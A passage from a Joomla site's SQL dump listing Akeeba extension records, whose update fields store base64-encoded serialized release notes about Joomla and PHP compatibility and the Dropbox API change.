administrators\",\"group\":\"\"}','{\"liveupdate\":\"stuck=0\\nlastcheck=1484326667\\nupdatedata=\\\"Tzo4OiJzdGRDbGFzcyI6ODp7czo5OiJzdXBwb3J0ZWQiO2I6MTtzOjU6InN0dWNrIjtiOjA7czo3OiJ2ZXJzaW9uIjtzOjU6IjMuOC42IjtzOjQ6ImRhdGUiO3M6MTA6IjIwMTYtMDctMDEiO3M6OToic3RhYmlsaXR5IjtzOjY6InN0YWJsZSI7czoxMToiZG93bmxvYWRVUkwiO3M6ODQ6Imh0dHA6Ly9jZG4uYWtlZWJhYmFja3VwLmNvbS9kb3dubG9hZHMvYWRtaW50b29scy8zLjguNi9jb21fYWRtaW50b29scy0zLjguNi1jb3JlLnppcCI7czo3OiJpbmZvVVJMIjtzOjU5OiJodHRwczovL3d3dy5ha2VlYmFiYWNrdXAuY29tL2Rvd25sb2FkL2FkbWludG9vbHMvMy04LTYuaHRtbCI7czoxMjoicmVsZWFzZW5vdGVzIjtzOjI2MDA6IjxoMz5SZWxlYXNlIGhpZ2hsaWdodHM8L2gzPjxwPiAgICA8c3Ryb25nPkpvb21sYSAzLjYgc3VwcG9ydDwvc3Ryb25nPi4gSm9vbWxhIDMuNiBoYXMgY2hhbmdlZCB0aGUgbG9jYXRpb24gb2YgdGhlIGxvZ3MgZGlyZWN0b3J5LiBUaGlzIHZlcnNpb24gICAgYWRkcmVzc2VzIHRoaXMgY2hhbmdlLjwvcD48cD4gICAgPHN0cm9uZz5Xb3JrYXJvdW5kcyBmb3IgSm9vbWxhIGlzc3Vlczwvc3Ryb25nPiByZWdhcmRpbmcgY2FjaGluZyBhbmQgZW1haWwgc2VuZGluZy48L3A+PHA+ICAgIDxzdHJvbmc+UHJlcGFyYXRpb24gZm9yIEFkbWluIFRvb2xzIDQ8L3N0cm9uZz4uIER1ZSB0byB0aGUgd2F5IEpvb21sYSB1cGRhdGVzIHdvcmogeW91IHdpbGwgbmVlZCB0byBpbnN0YWxsIHRoaXMgICAgdmVyc2lvbiBmaXJzdC4gVGhlIHVwZGF0ZSBzaXRlIGRlZmluaXRpb24gd2lsbCBiZSByZXBsYWNlZCB3aXRoIHRoZSBvbmUgZm9yIEFkbWluIFRvb2xzIDQgc28geW91J2xsIGJlIG5vdGlmaWVkICAgIHdoZW4gaXQncyByZWxlYXNlZCBhbmQgYmUgYWJsZSB0byB1cGRhdGUgdG8gaXQgd2l0aCBvbmUgY2xpY2suIDxlbT5JZiB5b3UgZG8gbm90IGluc3RhbGwgQWRtaW4gVG9vbHMgMy44LjQgeW91ICAgIHdpbGwgTk9UIGJlIGFibGUgdG8gdXBkYXRlIHRvIEFkbWluIFRvb2xzIDQgdGhyb3VnaCBKb29tbGEncyBleHRlbnNpb25zIHVwZGF0ZXI8L2VtPi48L3A+PGgzPkpvb21sYSEgMy54IG9ubHk8L2gzPjxwPiAgICBEZXNwaXRlIG91ciBwb2xpY3kgb2Ygb25seSBhbGxvd2luZyBpbnN0YWxsYXRpb24gb24gdGhlIGxhdGVzdCBKb29tbGEhIHJlbGVhc2UsIHRoaXMgdmVyc2lvbiB3aWxsIHJ1biBvbiAgICBKb29tbGEhIDMuMCwgMy4xLCAzLjIsIDMuMywgMy40LCAzLjUgYW5kIDMuNiB0byBtaXRpZ2F0ZSB0aGUgbWFqb3Igc2VjdXJpdHkgaXNzdWVzIGRpc2NvdmVyZWQgaW4gSm9vbWxhISBpbiBPY3RvYmVyICAgIGFuZCBEZWNlbWJlciAyMDE1LiBXZSA8c3Ryb25nPlZFUlkgU1RST05HTFk8L3N0cm9uZz4gYWR2aXNlIHlvdSB0byB1cGRhdGUgdG8gdGhlIGxhdGVzdCByZWxlYXNlZCB2ZXJzaW9uIG9mIEpvb21sYSEgICAgYXQgYWxsIHRpbWVzLiBBZG1pbiBUb29scycgc3VwcG9ydCBmb3Igb2xkIHZlcnNpb25zIG9mIEpvb21sYSEgaXMgb25seSBtZWFudCB0byBiZSBhIDxlbT50ZW1wb3Jhcnk8L2VtPiB3b3JrYXJvdW5kICAgIHdoaWxlIHlvdSdyZSB3b3JraW5nIG9uIHRoZSB1cGRhdGUgb2YgeW91ciBzaXRlLjwvcD48cD4gICAgUGxlYXNlIG5vdGUgdGhhdCB3ZSB3aWxsIG9ubHkgcHJvdmlkZSBmdWxsIHN1cHBvcnQgZm9yIHRoZSBsYXRlc3QgSm9vbWxhISB2ZXJzaW9uLiBTb21lIGZlYXR1cmVzIOKAk2xpa2UgICAgdGhlIENoYW5nZSBhZG1pbmlzdHJhdG9yIGRpcmVjdG9yeeKAkyBtYXkgbm90IHdvcmsgYXQgYWxsIGluIG9sZGVyIEpvb21sYSEgdmVyc2lvbnMuIFdlJ3ZlIHRob3JvdWdobHkgdGVzdGVkICAgIHRoZSBzZWN1cml0eSBjcml0aWNhbCBXZWIgQXBwbGljYXRpb24gRmlyZXdhbGwgZmVhdHVyZXMgYWdhaW5zdCBvbGRlciByZWxlYXNlcyBvZiBKb29tbGEhIGFuZCBmb3VuZCB0aGVtIHRvICAgIGJlIHdvcmtpbmcgcHJvcGVybHkuPC9wPjxoMz5QSFAgNS4zLjQgb3IgbGF0ZXIgNS54IHZlcnNpb24gaXMgcmVxdWlyZWQ8L2gzPjxwPiAgICBUaGlzIHZlcnNpb24gcmVxdWlyZXMgUEhQIDUuMy40IG9yIGxhdGVyIChlLmcuIDUuMy4yOSB3aGljaCBpcyB0d2VudHkgZml2ZSB2ZXJzaW9ucyBuZXdlciB0aGFuIFBIUCA1LjMuNCksICAgIDUuNCwgNS41IG9yIDUuNi4gUGxlYXNlIG5vdGUgdGhhdCBQSFAgNS4zIGlzIG9ic29sZXRlIHNpbmNlIEF1Z3VzdCAyMDE0IGFuZCB3ZSdyZSBnb2luZyB0byBzdG9wIHN1cHBvcnRpbmcgICAgaXQgd2l0aG91dCB3YXJuaW5nIGluIGZ1dHVyZSB2ZXJzaW9ucyBvZiBvdXIgc29mdHdhcmUuIFdlJ2QgbGlrZSB0byByZW1pbmQgeW91IHRoYXQgSm9vbWxhISAzLjQgZG9lcyBub3QgICAgY3VycmVudGx5IHN1cHBvcnQgUEhQIDcuIFlvdSBuZWVkIEpvb21sYSEgMy41IHRvIHJ1biBKb29tbGEhIGFuZCBBZG1pbiBUb29scyBvbiBQSFAgNy48L3A+PHAgY2xhc3M9InNtYWxsIj4gICAgTm90ZTogdGhlcmUgaXMgbm8gc3VjaCB0aGluZyBhcyBQSFAgNi4gUEhQIHZlcnNpb25zIGp1bXBlZCBmcm9tIDUuNiB0byA3LjAuIFdoeT8gV2VsbCwgICAgPGEgaHJlZj0iaHR0cHM6Ly9waGlsc3R1cmdlb24udWsvcGhwLzIwMTQvMDcvMjMvbmV2ZXJlbmRpbmctbXVwcGV0LWRlYmF0ZS1vZi1waHAtNi12LXBocC03LyI+ICAgIGl0J3MgYSBsb25nIHN0b3J5PC9hPi4gVEw7RFI6IEl0IGRvZXNuJ3QgaGF2ZSB0byBtYWtlIHNlbnNlLCBqdXN0IGFjY2VwdCBpdC48L3A+PGgzPkNoYW5nZWxvZzwvaDM+PGg0PkJ1ZyBmaXhlczwvaDQ+PHVsPiA8bGk+W0hJR0hdIFBIUCBGaWxlIENoYW5nZSBTY2FubmVyJ3MgQ0xJIHNjcmlwdCBkaWRuJ3Qgd29yazwvbGk+IDxsaT5bTE9XXSBQSFAgRmlsZSBDaGFuZ2UgU2Nhbm5lciBlbWFpbHMgKGZyb20gQ0xJKSBkaXNwbGF5ZWQgdGhlIEhUTUwgbWFya3VwIGluc3RlYWQgb2YgZm9ybWF0dGVkIHRleHQ8L2xpPjwvdWw+Ijt9\\\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10047,'System - Admin Tools','plugin','admintools','system',0,1,1,0,'{\"name\":\"System - Admin Tools\",\"type\":\"plugin\",\"creationDate\":\"2013-11-21\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"2.5.10\",\"description\":\"\\n\\t\\tHandles all the system-wide features provided by Admin Tools Core\\n\\t\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10048,'FOF','library','lib_fof','',0,1,1,0,'{\"name\":\"FOF\",\"type\":\"library\",\"creationDate\":\"2013-11-13 11:10:54\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2013 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.1.0\",\"description\":\"Framework-on-Framework (FOF) - A rapid component development framework for Joomla!\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10049,'AkeebaStrapper','file','files_strapper','',0,1,0,0,'{\"name\":\"AkeebaStrapper\",\"type\":\"file\",\"creationDate\":\"July 2012\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"(C) 2012-2013 Akeeba Ltd.\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"1.0.0\",\"description\":\"Namespaced jQuery, jQuery UI and Bootstrap for Akeeba products.\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10050,'akeeba','component','com_akeeba','',1,1,0,0,'{\"name\":\"Akeeba\",\"type\":\"component\",\"creationDate\":\"2013-11-20\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2012 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"3.9.1\",\"description\":\"Akeeba Backup Core - Full Joomla! site backup solution, Core Edition.\",\"group\":\"\"}','{\"siteurl\":\"http:\\/\\/hallcrestheights.org\\/\",\"jlibrariesdir\":\"\\/data\\/15\\/3\\/44\\/58\\/3044873\\/user\\/3391478\\/htdocs\\/libraries\",\"jversion\":\"1.6\",\"liveupdate\":\"stuck=0\\nlastcheck=1484335891\\nupdatedata=\\\"Tzo4OiJzdGRDbGFzcyI6ODp7czo5OiJzdXBwb3J0ZWQiO2I6MTtzOjU6InN0dWNrIjtiOjA7czo3OiJ2ZXJzaW9uIjtzOjU6IjQuNy40IjtzOjQ6ImRhdGUiO3M6MTA6IjIwMTYtMDctMzEiO3M6OToic3RhYmlsaXR5IjtzOjY6InN0YWJsZSI7czoxMToiZG93bmxvYWRVUkwiO3M6ODI6Imh0dHA6Ly9jZG4uYWtlZWJhYmFja3VwLmNvbS9kb3dubG9hZHMvYWtlZWJhYmFja3VwLzQuNy40L2NvbV9ha2VlYmEtNC43LjQtY29yZS56aXAiO3M6NzoiaW5mb1VSTCI7czo2MjoiaHR0cHM6Ly93d3cuYWtlZWJhYmFja3VwLmNvbS9kb3dubG9hZC9ha2VlYmEtYmFja3VwLzQtNy00Lmh0bWwiO3M6MTI6InJlbGVhc2Vub3RlcyI7czo3MzkyOiI8aDM+UmVsZWFzZSBoaWdobGlnaHRzPC9oMz48cD4gICAgPHN0cm9uZz5MYXN0IHJlbGVhc2UgY29tcGF0aWJsZSB3aXRoIFBIUCA1LjMgYW5kIEpvb21sYSEgMS42IHRvIDMuMyAoaW5jbHVzaXZlKS48L3N0cm9uZz4uICAgIElmIHlvdSBhcmUgb24gUEhQIDUuNCsgYW5kIEpvb21sYSEgMy40KyBwbGVhc2UgaW5zdGFsbCBBa2VlYmEgQmFja3VwIDUuPC9wPjxwPiAgICA8c3Ryb25nPlJlbW92ZWQgRHJvcGJveCBBUEkgdjEgaW50ZWdyYXRpb24uPC9zdHJvbmc+LiBJZiB5b3UgYXJlIHN0aWxsIHVzaW5nIGl0IHBsZWFzZSB1cGdyYWRlIHRvIG91ciBEcm9wYm94IEFQSSB2MiAgICBpbnRlZ3JhdGlvbiBpbW1lZGlhdGVseS4gVW5mb3J0dW5hdGVseSwgZHVlIHRvIHRoZSB3YXkgdGhlIHR3byBEcm9wYm94IEFQSSB2ZXJzaW9ucyB3b3JrIGl0IGlzIGltcG9zc2libGUgdG8gaGF2ZSBhbiAgICBhdXRvbWF0aWMgc3dpdGNoIHRvIHRoZSB2MiBBUEkuIFBsZWFzZSByZWFkIGJlbG93IGZvciBtb3JlIGluZm9ybWF0aW9uIGFib3V0IHRoZSBEcm9wYm94IHN3aXRjaC48L3A+PHA+ICAgIDxzdHJvbmc+UmVzdG9yYXRpb246IGEgd2FybmluZyBpcyBkaXNwbGF5ZWQgaWYgdGhlIGRhdGFiYXNlIHRhYmxlIG5hbWUgcHJlZml4IGNvbnRhaW5zIHVwcGVyY2FzZSBjaGFyYWN0ZXJzPC9zdHJvbmc+LiAgICBLZWVwIGluIG1pbmQgdGhhdCBNeVNRTCBkb2VzIG5vdCB3b3JrIHJlbGlhYmx5IHdpdGggdGFibGUgbmFtZXMgY29udGFpbmluZyB1cHBlcmNhc2UgY2hhcmFjdGVycyBvbiBzZXJ2ZXJzIHdpdGggYSAgICBjYXNlLWluc2Vuc2l0aXZlIGZpbGVzeXN0ZW0gc3VjaCBhcyBhbGwgV2luZG93cyBhbmQgbW9zdCBtYWNPUyBpbnN0YWxsYXRpb25zLiBUaGUgb25seSA8c3Ryb25nPlJFTElBQkxFPC9zdHJvbmc+IHdheSAgICB0byB0cmFuc2ZlciBhIHNpdGUgYmV0d2VlbiB0aGVzZSBzZXJ2ZXJzIGFuZCBhIGNhc2Utc2Vuc2l0aXZlIHNlcnZlciAoZS5nLiBMaW51eCwgd2hhdCBtb3N0IGhvc3RzIG91dCB0aGVyZSB1c2UpIGlzICAgIGhhdmluZyBhbGwgbG93ZXJjYXNlIHRhYmxlIG5hbWVzLiBKb29tbGEgYW5kIGl0cyBleHRlbnNpb25zIGFscmVhZHkgZG8gdGhhdC4gSG93ZXZlciwgaWYgeW91IHNldCB1cCBhIGRhdGFiYXNlIHRhYmxlICAgIG5hbWUgcHJlZml4IGluIHVwcGVyY2FzZSBvciBtaXhlZCBjYXNlIGxldHRlcnMgeW91IGFyZSB0cmlnZ2VyaW5nIE15U1FMJ3MgbGltaXRhdGlvbnMgd2hpY2ggd2lsbCByZXN1bHQgaW4gcHJvYmxlbXMgICAgYmFja2luZyB1cCBhbmQgcmVzdG9yaW5nIHlvdXIgc2l0ZS4gSWYgdGhhdCdzIHRoZSBjYXNlIHdpdGggeW91ciBzaXRlIHRoZSByZXN0b3JhdGlvbiBzY3JpcHQgd2lsbCB3YXJuIHlvdS4gICAgQ29udmVyc2VseSwgd2UgYWRkZWQgc29tZSBzbWFydCBjb2RlIGR1cmluZyBiYWNrdXAgdG8gbG9vayBmb3IgdGhlIHdyb25nIGNhc2UgdGFibGUgbmFtZXMgYW5kIDxzdHJvbmc+dHJ5PC9zdHJvbmc+ICAgIHRvIGJhY2sgdGhlbSB1cC4gSXQgdXN1YWxseSBjYW4gZG8gdGhhdCB1bmxlc3MgeW91J3ZlIGdvdCB0YWJsZXMgd2l0aCB0aGUgc2FtZSBuYW1lIGluIGFsbCBsb3dlcmNhc2UuIEluIHRoaXMgY2FzZSAgICB5b3UndmUgZ290IGEgYnJva2VuIGRhdGFiYXNlIGFuZCBub2JvZHkgY2FuIGhlbHAgeW91LiBZb3Ugc2hvdWxkIGhhdmUganVzdCByZWFkIG91ciBkb2N1bWVudGF0aW9uLiBXZSd2ZSB3YXJuZWQgeW91ICAgIGFib3V0IHRoaXMgc2luY2UgMjAwNy48L3A+PGgzPlJlbW92YWwgb2YgdGhlIERyb3Bib3ggdjEgQVBJIGludGVncmF0aW9uIGFuZCBob3cgdG8gc3dpdGNoIHRvIHRoZSB2MiBBUEk8L2gzPjxwPiAgICBXZSBoYXZlIHJlbW92ZWQgaW50ZWdyYXRpb24gd2l0aCB0aGUgRHJvcGJveCB2MSBBUEkgYmVjYXVzZSBEcm9wYm94IGl0c2VsZiAgICA8YSBocmVmPSJodHRwczovL2Jsb2dzLmRyb3Bib3guY29tL2RldmVsb3BlcnMvMjAxNi8wNi9hcGktdjEtZGVwcmVjYXRlZC8iPmFubm91bmNlZCBpdCBpcyBkZXByZWNhdGVkPC9hPiBhbmQgd2lsbCBiZSAgICB0dXJuZWQgb2ZmIGJ5IEp1bmUgMjh0aCwgMjAxNy4gV2UgY2hvc2UgdG8gcmVtb3ZlIHN1cHBvcnQgZm9yIHRoZSBkZXByZWNhdGVkIEFQSSBub3cgdG8gbWFrZSBzdXJlIHRoYXQgYWxsIG9mIG91ciAgICBjbGllbnRzIHdpbGwgYmUgcmVhZHkgZm9yIERyb3Bib3gnIGRlcHJlY2F0aW9uIG5leHQgeWVhci4gSWYgeW91IHRoaW5rIHRoYXQncyBhbiBvdmVya2lsbCBwbGVhc2Uga2VlcCBpbiBtaW5kIHRoYXQgICAgd2UgYWRkZWQgRHJvcGJveCB2MiBzdXBwb3J0IGluIE5vdmVtYmVyIDIwMTUgd2l0aCB0aGUgZG9jdW1lbnRhdGlvbiBub3RlIHRoYXQgaXQncyB0aGUgcmVjb21tZW5kZWQgdmVyc2lvbiBhbmQgdGhhdCAgICB0aGUgdjEgQVBJIG1heSBzdG9wIHdvcmtpbmcgYXQgYW55IHBvaW50LjwvcD48cD4gICAgVW5mb3J0dW5hdGVseSwgRHJvcGJveCcgdjEgYW5kIHYyIEFQSXMgYXJlIHZlcnkgZGlmZmVyZW50IGFuZCB0aGVyZSBpcyBubyB3YXkgdG8gaGF2ZSBhbiBhdXRvbWF0aWMgbWlncmF0aW9uIGZyb20gICAgdjEgdG8gdjIuIFRoZSBhY2Nlc3MgdG9rZW5zIHVzZWQgaW4gdGhlIHR3byBBUEkgdmVyc2lvbnMgYXJlIGFuZCB3b3JrIGRpZmZlcmVudC4gVGhpcyBtZWFucyB0aGF0IGJ5IHVwZ3JhZGluZyB0byBhICAgIG5ldyB2ZXJzaW9uIG9mIEFrZWViYSBCYWNrdXAgeW91ciBiYWNrdXAgcHJvZmlsZXMgd2hpY2ggd2VyZSB1c2luZyB0aGUgZGVwcmVjYXRlZCBEcm9wYm94IHYxIEFQSSAgICBpbnRlZ3JhdGlvbiBhcmUgbm8gbG9uZ2VyIGxpbmtlZCB0byBhIHBvc3QtcHJvY2Vzc2luZyBlbmdpbmUgYW5kIHByb2R1Y2UgZXJyb3JzLjwvcD48cD4gICAgTHVja2lseSB0aGVyZSdzIGEgdmVyeSBzaW1wbGUgcHJvY2VzcyB5b3UgaGF2ZSB0byBmb2xsb3cgPHN0cm9uZz5vbmNlPC9zdHJvbmc+IG9uIGV2ZXJ5IHNpdGUgYW5kIGJhY2t1cCBwcm9maWxlIHlvdSAgICB3YW50IHRvIChyZSlsaW5rIHRvIERyb3Bib3guPC9wPjxwPiAgICA8c3Ryb25nPlRISVMgUFJPQ0VTUyBPTkxZIE5FRURTIFRPIFRBS0UgUExBQ0UgT05DRSBQRVIgQkFDS1VQIFBST0ZJTEUgQU5EIFNJVEUhPC9zdHJvbmc+PC9wPjx1bD4gICAgPGxpPkdvIHRvIHlvdXIgQWtlZWJhIEJhY2t1cCBtYWluIHBhZ2UuPC9saT4gICAgPGxpPlNlbGVjdCB0aGUgYmFja3VwIHByb2ZpbGUgeW91IHdhbnQgdG8gcmVsaW5rLjwvbGk+ICAgIDxsaT5DbGljayBvbiBDb25maWd1cmF0aW9uLjwvbGk+ICAgIDxsaT5JbiB0aGUgUG9zdC1wcm9jZXNzaW5nIEVuZ2luZSBkcm9wZG93biBzZWxlY3Qg4oCcVXBsb2FkIHRvIERyb3Bib3ggKHYyIEFQSSnigJ08L2xpPiAgICA8bGk+Q2xpY2sgb24g4oCcQ29uZmlndXJl4oCdIG5leHQgdG8gaXQuPC9saT4gICAgPGxpPkNsaWNrIG9uIHRoZSDigJxBdXRoZW50aWNhdGlvbiDigJMgU3RlcCAx4oCdIGJ1dHRvbi48L2xpPiAgICA8bGk+WW91IG1heSBoYXZlIHRvIGxvZyBpbiB0byBEcm9wYm94IGlmIHlvdSBhcmUgbm90IGFscmVhZHkgbG9nZ2VkIGluLiBBbHNvLCBpZiB5b3UgaGFkIG5vdCBhdXRob3JpemVkIGFub3RoZXIgICAgICAgIEFrZWViYSBCYWNrdXAgb3IgQWtlZWJhIFNvbG8gaW5zdGFsbGF0aW9uIHRvIHVzZSBEcm9wYm94IHlvdSBtYXkgc2VlIGEgY29uZmlybWF0aW9uIGFib3V0IGl0LiBJZiB5b3UgYXJlIGFscmVhZHkgICAgICAgIGxvZ2dlZCBpbiBhbmQgaGF2ZSBhdXRob3JpemVkIG91ciBzb2Z0d2FyZSB0byB1c2UgRHJvcGJveCB5b3Ugd2lsbCBub3Qgc2VlIGFueSBvZiB0aGF0LjwvbGk+ICAgIDxsaT5Zb3UgdGhlbiBzZWUgYSBwYWdlIHdpdGggdGhlIGJpZyB0aXRsZSDigJxEcm9wYm94IEF1dGhlbnRpY2F0aW9uIGlzIGFsbW9zdCBjb21wbGV0ZeKAnS4gQ2xpY2sgb24gdGhlIGJsdWUg4oCcQ29tcGxldGUgICAgICAgIERyb3Bib3ggYXV0aGVudGljYXRpb27igJ0gYnV0dG9uIGJlbG93IGl0LjwvbGk+ICAgIDxsaT5Ob3cgeW91J3JlIGJhY2sgdG8gQWtlZWJhIEJhY2t1cC4gQ2xpY2sgb24gU2F2ZSAmIENsb3NlIHRvIGNvbXBsZXRlIHRoZSBzZXR1cC48L2xpPjwvdWw+PHA+ICAgIFVubGlrZSB0aGUgRHJvcGJveCB2MSBBUEkgeW91IDxzdHJvbmc+bXVzdCBub3Q8L3N0cm9uZz4gY29weSB0aGUgdG9rZW4gZnJvbSBvbmUgcHJvZmlsZSAvIHNpdGUgdG8gYW5vdGhlci4gSW5zdGVhZCwgICAgcmVwZWF0IHRoZSBwcm9jZXNzIGFib3ZlLiBEcm9wYm94IEFQSSB2MiBwcm9kdWNlcyBhIG5ldyB0b2tlbiBldmVyeSB0aW1lIHlvdSBsaW5rIGEgbmV3IGJhY2t1cCBwcm9maWxlIG9yIHNpdGUgdG8gICAgRHJvcGJveCA8ZW0+d2l0aG91dDwvZW0+IHJldm9raW5nIHRoZSBwcmV2aW91cyBvbmUuPC9wPjxwPiAgICBBZ2Fpbiwgd2UgYXBvbG9naXplIGZvciBoYXZpbmcgdG8gZ28gdGhyb3VnaCB0aGlzIHByb2Nlc3MgYnV0IHRoaXMgaXMgZHVlIHRvIGNoYW5nZXMgbWFkZSBvbiBEcm9wYm94JyBzaWRlLiBPbiB0aGUgICAgdXBzaWRlLCB0aGUgRHJvcGJveCBBUEkgdjIgaXMgbXVjaCBtb3JlIHN0YWJsZSwgYWxsb3dzIGZvciBiaWdnZXIgdXBsb2FkcyBhbmQgbGV0cyB1cyBwZXJmb3JtIOKAnGNodW5rIHVwbG9hZHPigJ0sIGEgICAgdGVjaG5pcXVlIHdoaWNoIGFsbG93cyB1cyB0byB0cmFuc2ZlciB2ZXJ5IGxhcmdlIGJhY2t1cCBhcmNoaXZlcyB3aXRob3V0IHlvdSBoYXZpbmcgdG8gc2V0IHVwIHNtYWxsIHBhcnQgc2l6ZXMuIFlvdSAgICBjYW4gbm93IHNhZmVseSB1c2UgYSBQYXJ0IFNpemUgZm9yIFNwbGl0IEFyY2hpdmVzIHVwIHRvIDIwNDcgTWIgd2l0aG91dCBhbnkgdXBsb2FkIHdvcnJpZXMuPC9wPjxoMz5Kb29tbGEhIDEuNiBvciBsYXRlcjwvaDM+PHA+ICAgIFRoaXMgdmVyc2lvbiBpcyBjb21wYXRpYmxlIHdpdGggSm9vbWxhISAxLjYsIDEuNywgMi41LCAzLjAsIDMuMSwgMy4yLCAzLjMsIDMuNCBhbmQgMy41LjwvcD48cD4gICAgUGxlYXNlIG5vdGUgdGhhdCB3ZSBkbyBOT1QgcmVjb21tZW5kIHVzaW5nIEpvb21sYSEgMS54IC8gMi54IG9yIDMuMCB0byAzLjMgaW5jbHVzaXZlIG9uIHByb2R1Y3Rpb24gc2l0ZXMgZHVlIHRvICAgIG1ham9yIHNlY3VyaXR5IGlzc3Vlcy4gU3VwcG9ydCBmb3IgdGhlc2Ugb2xkIHZlcnNpb25zIGlzIGludGVuZGVkIHRvIGdpdmUgeW91IHRoZSBvcHRpb24gb2YgdGFraW5nIGEgZnVsbCBzaXRlICAgIGJhY2t1cCBwcmlvciB0byB1cGdyYWRpbmcgdG8gdGhlIGxhdGVzdCBhdmFpbGFibGUgSm9vbWxhISByZWxlYXNlLjwvcD48aDM+UEhQIDUuMy4zIG9yIGxhdGVyIDUueCB2ZXJzaW9uIGlzIHJlcXVpcmVkPC9oMz48cD4gICAgPHN0cm9uZz5JZiB5b3UgaGF2ZSBKb29tbGEhIDMuNCBvciBsYXRlciBhbmQgUEhQIDUuNCBvciBsYXRlciBwbGVhc2UgdXNlIEFrZWViYSBCYWNrdXAgNS54LiBUaGlzIHZlcnNpb24gb2YgICAgICAgIEFrZWViYSBCYWNrdXAgKDQuNy54KSB3aWxsIG9ubHkgcmVjZWl2ZSB2ZXJ5IGlycmVndWxhciBzZWN1cml0eSBmaXhlcyBidXQgTk8gYnVnIGZpeGVzIG9yIG5ldyBmZWF0dXJlcy48L3N0cm9uZz4gICAgVGhpcyB2ZXJzaW9uIG9mIEFrZWViYSBCYWNrdXAgaXMgb25seSBwdWJsaXNoZWQgZm9yIHBlb3BsZSBtYW5hZ2luZyBvbGRlciBzaXRlcyBzbyB0aGF0IHRoZXkgY2FuIGJhY2sgdGhlbSB1cCBiZWZvcmUgICAgdXBncmFkaW5nIHRoZW0uIEFueSBvdGhlciB1c2UgaXMgc3Ryb25nbHkgTk9UIHJlY29tbWVuZGVkITwvcD48cD4gICAgVGhlIG1pbmltdW0gcmVxdWlyZWQgUEhQIHZlcnNpb24gaXMgNS4zLjAzLiBBbGwgdmVyc2lvbnMgb2YgUEhQIGZyb20gNS4zLjAzIG9ud2FyZHMgYXJlIHN1cHBvcnRlZCwgaW5jbHVkaW5nIDUuNCwgICAgNS41LCA1LjYgYW5kIHRoZSBqdXN0IHJlbGVhc2VkIFBIUCA3LjAuIFRoZSBjb21wb25lbnQgd2lsbCBub3Qgd29yayBvbiBQSFAgNS4yIG9yIGVhcmxpZXIgYW5kIHdpbGwsIGluIGZhY3QsIHJlZnVzZSAgICB0byBpbnN0YWxsIG9uIGl0LiBXZSdkIGxpa2UgdG8gcmVtaW5kIHlvdSB0aGF0IEpvb21sYSEgMy40IGFuZCBlYXJsaWVyIGRvZXMgTk9UIHN1cHBvcnQgUEhQIDcuIEpvb21sYSEgMy41IChjdXJyZW50bHkgICAgaW4gYmV0YSkgZG9lcyBzdXBwb3J0IFBIUCA3LiBBa2VlYmEgQmFja3VwIHdpbGwgd29yayBqdXN0IGZpbmUgaW4gYSBKb29tbGEhIDMuNSBzaXRlIHJ1bm5pbmcgb24gUEhQIDcuMC48L3A+PHA+ICAgIDxzbWFsbD5Ob3RlOiB0aGVyZSBpcyBubyBzdWNoIHRoaW5nIGFzIFBIUCA2LiBQSFAgdmVyc2lvbnMganVtcGVkIGZyb20gNS42IHRvIDcuMC4gV2h5PyBXZWxsLCAgICAgICAgPGEgaHJlZj0iaHR0cHM6Ly9waGlsc3R1cmdlb24udWsvcGhwLzIwMTQvMDcvMjMvbmV2ZXJlbmRpbmctbXVwcGV0LWRlYmF0ZS1vZi1waHAtNi12LXBocC03LyIgcmVsPSJub2ZvbGxvdyI+aXQncyBhIGxvbmcgc3Rvcnk8L2E+LiBUTDtEUjogSXQgZG9lc24ndCBoYXZlIHRvIG1ha2Ugc2Vuc2UsIGp1c3QgYWNjZXB0IGl0LiAgICA8L3NtYWxsPjwvcD48aDM+Q2hhbmdlbG9nPC9oMz48aDQ+QnVnIGZpeGVzPC9oND48dWw+IDxsaT5bTUVESVVNXSBNdWx0aSBkYiB2aWV3IHdhc24ndCBzYXZpbmcgdGhlIHZhbHVlczwvbGk+PC91bD48aDQ+TmV3IGZlYXR1cmVzPC9oND48dWw+IDxsaT5SZXN0b3JhdGlvbjogYSB3YXJuaW5nIGlzIGRpc3BsYXllZCBpZiB0aGUgZGF0YWJhc2UgdGFibGUgbmFtZSBwcmVmaXggY29udGFpbnMgdXBwZXJjYXNlIGNoYXJhY3RlcnM8L2xpPjwvdWw+PGg0Pk1pc2NlbGxhbmVvdXMgY2hhbmdlczwvaDQ+PHVsPiA8bGk+V29ya2Fyb3VuZCBmb3Igc2l0ZXMgd2l0aCB1cHBlci0gb3IgbWl4ZWQtY2FzZSBwcmVmaXhlcyAvIHRhYmxlIG5hbWVzIG9uIE15U1FMIHNlcnZlcnMgcnVubmluZyBvbiBjYXNlLWluc2Vuc2l0aXZlIGZpbGVzeXN0ZW1zIGFuZCBsb3dlcl9jYXNlX3RhYmxlX25hbWVzID0gMSAoZGVmYXVsdCBvbiBXaW5kb3dzKTwvbGk+IDxsaT5Zb3Ugd2lsbCBnZXQgYSB3YXJuaW5nIGlmIHlvdSB0cnkgdG8gYmFja3VwIHNpdGVzIHdpdGggdXBwZXItIG9yIG1peGVkLWNhc2UgcHJlZml4ZXMgYXMgdGhpcyBjYW4gY2F1c2UgbWFqb3IgcmVzdG9yYXRpb24gaXNzdWVzLjwvbGk+PC91bD48aDQ+UmVtb3ZlZCBmZWF0dXJlczwvaDQ+PHVsPiA8bGk+UmVtb3ZlZCBEcm9wYm94IEFQSSB2MSBpbnRlZ3JhdGlvbi4gVGhlIHYxIEFQSSBpcyBnb2luZyB0byBiZSBkaXNjb250aW51ZWQgYnkgRHJvcGJveCwgc2VlIGh0dHBzOi8vYmxvZ3MuZHJvcGJveC5jb20vZGV